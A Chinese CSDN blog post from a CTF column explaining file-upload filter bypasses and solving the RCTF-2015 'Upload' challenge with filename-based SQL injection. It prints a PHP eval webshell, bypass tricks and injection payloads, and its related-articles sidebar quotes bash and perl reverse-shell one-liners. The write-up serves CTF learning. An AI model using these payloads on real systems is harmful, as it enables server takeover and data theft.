文件上传---滴滴!我要上传shell

最新推荐文章于 2023-04-19 22:58:06 发布
最新推荐文章于 2023-04-19 22:58:06 发布
阅读量3.1k 收藏
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a1309525802/article/details/105465809
版权

SQL-4


1.为什么要去理解该知识点
2.原理
3.自己的理解和实践
4.CTF题目案例






声明一点以下可能说的不是很友好,所以如有敏感词汇请评论我,作者会改






日常抱怨话语:文件上传没什么抱怨的,主要就是学会过滤






为什么要去理解该知识点

文件上传在CTF真的很常见,而且大多数过滤,有小数部分是注入,文件上传的目的常常传一句话木马然后利用菜刀或蚁剑来查找文件或者连接其数据库,但是你想传成功,哦不,CTF不可能让你那么轻松的,常见的套路无疑是以下几点:
1.只允许传图片格式文件
2.过滤掉文件名或内容中含有php等关键词
3.不生成上传路径















原理

只允许传图片格式文件

这种无疑是最常见但是过滤起来是最简单的,如果要过滤的那就送你一个字-------->套
如何套?你可以试试以下几种:
1.删除属性
2.用burp将文件改为.php
3.修改Content-Type
4.查看后端是如何进行判断

删除属性
删除属性的原理在于通过前端了判断你文件格式是否为图片格式,所以你需要进入开发者模式然后查看其调用了什么函数,然后将其禁用即可
用burp将文件改为.php
这种相对来说比较简单,可以直接用burp改其后缀名为php,这种简单的修改也不是很常见,比较CTF不会出这么简单的
修改Content-Type

Content-Type表示上传的类型,后端大部分通过其进行判断,所以将Content-Type修改为图片格式类型即可绕过,常见的图片类型:
1.image/jpeg
2.image/png
3.image/gif

查看后端是如何进行判断
网上常见的过滤有php.jpg.php进行过滤,我们可以通过其来讲解,有些后端是通过判断文件名的后缀名来判断文件类型,有时判断语句会先判断第一个.后面的内容为jpg/png/gif/bmp格式,有时会判断最后一个,所以对于这些通常用%00截断来过滤,原理在于php无法识别%00后面的内容,如果要详细明白其原理那就要你自己去百度了,这里我也不太明白

过滤掉文件名或内容中含有php等关键词

这种比较考php知识点,但是过滤其实还是与sql注入过滤原理差不多
1.大小写混写
2.叠写
3.Php的其他扩展名(pht,phtm,php3,php4,php5,php6,php6)

有时会过滤掉文件内容,常见的一句话木马

<?
php @eval($_POST['pass']);
?>

有时他也会同时将<?过滤掉,所以可以使用等价函数

不生成上传路径

这种比较难,而且现在出现的比较少,但是还是挺难的,面对这种一般都需要看是否有源代码泄露,或者看上传文件后有什么提示,有时会考虑到文件上传漏洞







CTF题目案例

RCTF-2015--->UPload

打开网站呈现这样:
在这里插入图片描述

遇到这种,先不考虑注入,先考虑登录成功后页面查看是否有可用知识,如没有或者无法登进就要考虑是用万能密码还是sql注入
在这里插入图片描述
登入进去后呈现这样,可以发现是上传,那就尝试用burp抓包普通上传,看是否返回上传路径.如有则上传一句话,如需要过滤则用上面的”套”进行过滤
上传一个正常的文件后,页面返回内容为
在这里插入图片描述
在这里插入图片描述
那就要先考虑是否有源码泄露
尝试robots.txt,memberpage.php.bak,index.php.bak,/.git/,www.zip都无果
那就考虑是否为文件上传注入漏洞,看到前面有回显文件名
所以可以初步判断为文件上传注入漏洞,sql语句可能为:
INSERT INTO xxx(uid, name) VALUES (‘uid号’,‘图片名’)
因为图片名会回显,所以讲图片名分解为’+hex(database())+’.jpg 这里用hex也是看其他大佬writeup的,反正不用则会回显0,主要原理还是不是明白,可能考虑到sql内核函数问题
将文件名改为’+hex(database())+’.jpg 页面回显为7765625
长度为7,那肯定有问题,因为网上的十六进制转文本都是每二个字符进行组合转换的
所以可以猜测十六进制并没有显示完整,所以可以尝试将其转换为十进制输出
用到的函数为conv(strng,当前进制,转换后的进制)
将文件名改为’+(conv(hex(database()),16,10))+’.jpg,页面回显为一个科学计数法,说明十进制数字很大,所以需要进行字符串截取
Substr()
Playload:

'+(conv(substr(hex(database()),1,12),16,10))+'.jpg

这里为什么截取12个字符,这里也不要说明,你可能将12变成13试试就明白了
回显:
131277325825392
暂时不需要转换,因为你已经知道十进制肯定大于12
所以继续,直到超出长度报错就可
最后组合得到十进制为:1312773258253921819238756转换为文本:web_upload
然后进行爆表:

'+(conv(substr(hex((select table_name from information_schema.tables where table_schema='web_upload' limit 1,1)),1,12),16,10))+'.jpg

在这里插入图片描述
发现过滤了select ,from
所以可能尝试大小写,叠写,内置注释符
这里就直接用大佬的方法用叠写

'+(conv(substr(hex((selecselectt table_name frofromm information_schema.tables where table_schema='web_upload' limit 1,1)),1,12),16,10))+'.jpg

得到回显,同样像上面一样,最后组合的十进制为:114784820031327112615676665705112615676665705转文本为:hello_flag_is_here

继续爆类名

'+(conv(substr(hex((selecselectt column_name frofromm information_schema.columns where table_name='hello_flag_is_here' limit 0,1)),1,12),16,10))+'.jpg

最后得到类名:i_am_flag
然后爆值

'+(conv(substr(hex((selecselectt i_am_flag frofromm hello_flag_is_here limit 0,1)),1,12),16,10))+'.jpg

最后得到flag

最后可以参考一下大佬的writeup

山与路
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Shell脚本常用命令及如何通过shell脚本实现服务器上文件的上传和下载
longerqingqia22的博客
02-19 3974
Shell 是一个用 C 语言编写的应用程序,这个应用程序提供了一个界面,用户通过这个界面访问操作系统内核的服务。Shell 脚本(shell script),是一种为 shell 编写的脚本程序,扩展名为.sh。
linux下用shell脚本实现sftp文件上传
weixin_42952472的博客
03-09 5183
先实现文件上传,文件下载过后在和大家分享。先把代码贴出来,亲测可用的,你们用需要改一些用户名,密码,待上传文件目录、sftp目录等。 #!/bin/bash #SFTP配置信息 #用户名 USER=jijian #密码 PASSWORD=jj #待上传文件根目录 SRCDIR=/home/databackup #SFTP目录 DESDIR=/home/jijian #IP IP=10.2.5.142 #端口 PORT=22 #获取文件 cd ${SRCDIR} ; #目录下的所有文件 #FILES=`ls
基于文件上传漏洞获得网站 shell 权限
m0_58001548的博客
04-19 1701
File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的 webshell 权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx 等都曝出过文件上传漏洞。
使用xshell上传文件
热门推荐
shejiataoBlog
01-10 4万+
一.xshell连接Linux主机 1.选择新建会话 2.填写远程公网IP 3.填写用户名 4.填写连接密码 连接完成状态: 二.上传文件 1.安装rz命令 输入rz命令,看是否已经安装了lrzsz 如果没有安装则执行下方命令进行安装 # yum -y install lrzsz 2.确认是否正确安装 安装成功后,输入rpm命令确认是否正确安装 # rpm -qa lrzsz 3.上传本地文件 使用 #rz -y命令进行文件上传,此时会弹出上传的窗口: #rz -y 4.成功页面
Windows各种版本上传shell写法
qq_52612931的博客
08-17 243
#bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 #perl版本: perl -e ‘use Socket;i="10.0.0.1";i="10.0.0.1";i="10.0.0.1";p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in(p,inetaton(p,inet_aton(p,ineta​ton(i)))){o
shell 写入文件_文件上传的一个骚操作(低权限+bypassAV)
weixin_39976499的博客
01-22 419
各位在渗透中是否遇见过这个问题:虽然有低权限命令shell,如mssql、postgres等,执行下载总是各种无权限或者被AV杀,轻则无法继续渗透,重则弹出拦截消息,管理员上机后立马发现。本文将介绍一种使用windows自带工具进行编码,写入编码数据到TXT文本最后再解码的骚操作。话不多说,例如这样场景:在数据库连接后或者sqlmap注入连接os-shell后可执行命令:其中包括杀软或某狗、某盾:...
p0wny-shell:单文件PHP Shell
05-25
文件上传到服务器(使用upload 命令) 从服务器下载文件(使用download 命令) 警告:此脚本是安全漏洞。 除非您知道自己在做什么,否则请勿将其上传到服务器上! Docker演示: docker build -t p0wny . ...
mysql-shell-8.0.30-linux-glibc2.12-x86-64bit.tar.gz
最新发布
08-17
在标题提及的"mysql-shell-8.0.30-linux-glibc2.12-x86-64bit.tar.gz"文件中,我们获取的是适用于Linux系统(glibc2.12版本)的64位MySQL Shell版本8.0.30,这是MySQL数据库8.0系列的一个重要组件。 MySQL 8.0相较...
NX-Shell:Nintendo Switch的多功能文件管理器
02-04
【NX-Shell】是针对Nintendo Switch游戏主机的一款强大的开源文件管理工具,主要由开发者Joel16编写,采用C++编程语言实现。它属于“homebrew”范畴,即非官方的、用户自制的应用程序,允许用户对Switch进行更深度的...
Shell GBK文件转UTF-8文件处理脚本
04-04
Shell脚本,实现gbk文件到utf-8文件之间的转换。用于开发测试时将Windows上传的文件转换成所需的格式。
mysql-shell-8.0.18-windows-x86-64bit.zip
01-12
mysql-shell-8.0.18-windows-x86-64bit.zip MySQL Shell is an advanced command-line client and code editor for MySQL. In addition to SQL, MySQL Shell also offers scripting capabilities for JavaScript ...
如何上传WEBSHELL思路
12-26
如何上传WEBSHELL思路 如何上传WEBSHELL思路 如何上传WEBSHELL思路
SpringBoot项目中读取配置文件参数的注解
醉梦洛的博客
10-08 2427
1.配置文件参数展示 如图所示:application.properties文件中的app.upload.location就是上传文件时所需要的额参数key了 2.通过上面配置文件中写了各个参数,下面怎么在Controlle里面读取? 本来在控制器方法里面写上传下载的默认路径是这样的 由于采用了配置文件,所以就用读取配置文件的方式去处理这个文件路径 ①删掉之前的String path = "d:/uploaded"; ②在Controller的方法上面定义文件路径属性 如图所示,.
2.Upload上传组件自定义上传实例及注意点
tangcc的博客
09-26 1万+
1.自定义上传时,当选中图片this.$refs.upload.submit() 就会触发:http-request = "httpRequest"事件 。 &lt;el-form-item :label="upload_lable" :label-width="formLabelWidth"&gt; &lt;el-upload class="upload-demo" ref="uplo
墨者学院 - WebShell文件上传分析溯源(第2题)
多崎巡礼的博客
08-01 2309
御剑扫描网址可以得到 ip/admin/upload1.php,ip/admin/upload2.php 尝试 ip/admin/upload.php,发现直接跳转upload1.php,没有访问权限继续跳转upload2.php burpsuite抓包,截取upload.php,查看源码得到 forward一下 将uploadmd5更改为 upload_file.php 发送给re...
linux上传文件到百度云盘(使用shell脚本,不依赖python库)
zhaojiyuan1024的博客
06-26 7294
linux上传文件到百度云盘(使用shell脚本) 自动上传文件到百度云百度云网盘 shell脚本上传文件到百度云网盘 定时备份文件到百度云网盘 实现利用Linux shell脚本来直接上传本地文件到百度云盘
[shell]上传本地文件至远程服务器
weixin_38665509的博客
01-12 3725
windows的cmd命令和Linux有所不同,本文讲析cmd上传本地文件至远程服务器方案。 Windows的cmd中cd指令无法转换路径怎么办? 1,首先我们看看盘符,我的电脑里有 C D E盘。 2,按下WIN+R键 输入cmd,打开cmd窗口。 3,默认路径为用户文档路径,如果想切换到D盘 ,输入cd d: 是不行的。 4,AppData是C盘里的一个目录,如果用cd指令想切换到这个目录之下是可以的。 5,如果我们要切换盘符的目录,正确的用法是在cd..
shell 简单的文件上传
Dawn
05-07 822
#!/bin/bash ftpPath=$1 lcdPath=$2 ftp -v -n 192.168.92.1<<EOF user administrator 123 cd $ftpPath lcd $lcdPath prompt mput * bye EOF 还不会写上传文件夹的~~
上传文件shell
hudeyong926的专栏
05-08 205
ion.phtml /data/www/wwwroot/test.com/www/app/design/frontend/default/ddl_new/template/ticket /data/www/wwwroot/test.com/www/app/design/frontend/default/ddl_new/layout/customer.xml /data/www/wwwroot/test.com/www/app/code/local/test/Ticket /data/www/wwwr
sqlmap --os-shell上传shell
04-12
b的意思是运行命令的前缀,sqlmap是一款自动化SQL注入工具。--os-shell表示运行命令并打开操作系统的shell。上述命令的含义是在SQL注入后上传一个shell并打开操作系统的shell,以便执行系统命令。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值